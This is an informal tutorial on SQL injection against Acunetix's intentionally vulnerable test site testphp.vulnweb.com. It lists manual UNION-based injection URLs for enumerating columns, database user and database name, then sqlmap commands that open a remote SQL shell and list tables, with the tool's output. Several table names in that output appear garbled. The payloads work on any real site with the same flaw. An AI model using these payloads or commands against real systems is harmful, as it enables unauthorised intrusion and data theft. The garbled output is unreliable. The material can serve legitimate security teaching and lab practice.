How to do sql injections with SQLMAP

Hi everyone, today I will explain how to use a tool called sqlmap, this tool make your life easier , instead guessing the correct url to get the information that you need from the server with weird and complex combinations. There is a website that acunetix made available for sql tests : http://testphp.vulnweb.com/

So, I know that there is a problem in this URL http://testphp.vulnweb.com/listproducts.php?cat=1 because if you type http://testphp.vulnweb.com/listproducts.php?cat=' , you get a msql error :

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php on line 74

Now if you want to know how many fields this table has, you have to type this
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 4--
and so on until you get another error, in this case, is 11, so you know that there is 11 fields on this table because if you put order by 12 you get an error.
Ok, now if want to know the user that is running this database I would type :
http://testphp.vulnweb.com/listproducts.php?cat=1 UNION SELECT ALL 1,USER(),3,4,5,6,7,8,9,10,11--
Or the database name..
http://testphp.vulnweb.com/listproducts.php?cat=1 UNION SELECT ALL 1,DATABASE(),3,4,5,6,7,8,9,10,11--
Check the botton of the page for the results.


Pretty boring and time consuming heim? Lets make this easier with sqlmap.
You can download sqlmap or use the one that is in backtrack : root@bt:/pentest/database/sqlmap/
Open the sqlmap.conf and put the vuln url in the url field, it should look like this :
url = http://testphp.vulnweb.com/listproducts.php?cat=1
save it and now lets run some tests.

1) sqlmap -h ( look all the different things you can do)
2) lets open a sql shell on the remote server with this command : ./sqlmap.py -c sqlmap.conf --sql-shell
Now you are on a shell, you can type any sql query, here are some examples in my sql shell:

web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[21:28:02] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> version()
do you want to retrieve the SQL statement output? [Y/n] y
[21:28:55] [INFO] fetching SQL query output: 'version()'
[21:28:55] [INFO] retrieved: 5.0.22-Debian_0ubuntu6.06.6-log
version(): '5.0.22-Debian_0ubuntu6.06.6-log'

sql-shell> user()
do you want to retrieve the SQL statement output? [Y/n] y
[21:29:39] [INFO] fetching SQL query output: 'user()'
[21:29:39] [INFO] retrieved: acuart@localhost
user(): 'acuart@localhost'

################
Now lets lists all databases and tables with the command : ./sqlmap.py -c sqlmap.conf --tables
And this is the result :
Database: acuart
[7 tables]
+---------------------------------------+
| aaars |
| aaastbes |
| aaastbook |
| aaatured |
| aarts |
| aateg |
| artists |
+---------------------------------------+

Database: modrewriteShop
[1 table]
+---------------------------------------+
| products |
+---------------------------------------+

Database: information_schema
[16 tables]
+---------------------------------------+
| CABGG |
| CABGGERIVILEGES |
| CABGGERS |
| CABLES |
| CABLE_CONSTRAINTS |
| CABLE_PRIVILEGES |
| CCATISTICS |
| CCHEMATA |
| CCHEMA_PRIVILEGES |
| CEUTINES |
| CEY_COLUMN_USAGE |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
+---------------------------------------+


Pretty easy don't you think? Well, this is just and introduction on what you can do this sqlmap, have fun!!